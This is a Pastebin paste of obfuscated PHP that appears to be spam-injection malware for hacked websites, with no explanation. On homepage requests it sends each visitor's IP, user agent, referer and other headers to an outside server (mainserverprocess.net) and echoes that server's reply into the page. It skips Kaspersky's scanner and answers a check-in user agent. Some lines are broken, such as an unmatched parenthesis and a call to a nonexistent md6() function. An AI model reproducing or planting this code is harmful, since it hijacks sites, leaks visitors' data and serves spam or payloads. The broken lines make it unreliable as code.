Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- $_0 = 5;
- $_ua1 = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6';
- $_2 = $_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI'];
- $_2 = str_replace('&', '%26', $_2);
- $_3 = @$_SERVER['HTTP_HOST'];
- $_3 = str_replace('www.', '', $_3);
- $_3 = strtolower($_3);
- $_4 = md5($_3 .'morda');
- $_5 = 0;
- $_ref6 = @$_SERVER['HTTP_REFERER'];
- if (strstr($_ref6, 'viagra')) { $_keyword = 'viagra'; }
- if (strstr($_ref6, 'cialis')) { $_keyword = 'cialis'; }
- if (strstr($_ref6, 'propecia')) { $_keyword = 'propecia'; }
- if (strstr($_ref6, 'lipitor'))) { $_keyword = 'lipitor'; }
- if (strstr($_ref6, 'nexium')) { $_keyword = 'nexium'; }
- if ($_SERVER['HTTP_USER_AGENT']=='NZgroup'){
- die("<font color='green'>CHETKO</font>#"."#OK");
- }
- if (($_SERVER['REQUEST_URI']=='/') AND ($_SERVER["HTTP_USER_AGENT"]<>"Kaspersky Internet Security")){
- $_remote_url = "http://mainserverprocess.net/googleornot/dtbnz.php";
- $_0 = 5;
- function l__0($_url, $post_query, $_11=l__1){
- $_12 = array("http"=> array("method"=> "POST", "content"=> $post_query));
- if ($_11 !== l__1){
- $_12['http']['header']=$_11;
- }
- $_13 = stream_context_create($_12);
- $_14 = @fopen($_url, 'rb', false, $_13);
- if (!$_14) { return false; }
- stream_set_timeout($_14, 5);
- $_15 = stream_get_contents($_14);
- if ($_15 === false) { return false; }
- return $_15;
- }
- $_16 = $_SERVER['HTTP_HOST'];
- $_17 = $_SERVER['REQUEST_URI'];
- $_18 = str_replace('www.', '', $_16);
- $_18 = md5($_18);
- $_19 = trim(str_replace('www.', '', $_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']));
- $_19 = md6($_19);
- $_accept_lang = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
- $_UA = @$_SERVER['HTTP_USER_AGENT'];
- $_referer = @$_SERVER['HTTP_REFERER'];
- $_host = @$_SERVER['HTTP_HOST'];
- $_24 = @$_SERVER['HTTP_X_FORWARDED_FOR'];
- $_remote_addr = @$_SERVER['REMOTE_ADDR'];
- $_26 = @$_SERVER['QUERY_STRING'];
- $_27 = @$_SERVER['SERVER_SIGNATURE'];
- $_28 = @$_SERVER['REQUEST_URI'];
- $_29 = $_remote_addr;
- $_referer = str_replace('&', '%26', $_referer);
- $_30 = l__0($_remote_url, "host=" .$_16 .
- "&agent=" .$_17 .
- '&sr=' .$_28 .
- '&sal=' .$_accept_lang .
- '&sua=' .$_UA .
- '&sref=' .$_referer .
- '&sh=' .$_host .
- '&sff=' .$_24 .
- '&sra=' .$_remote_addr .
- '&sqs=' .$_26 .
- '&ss=' .$_27 .
- '&pill=' .@$_keyword);
- echo $_30;
- exit;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement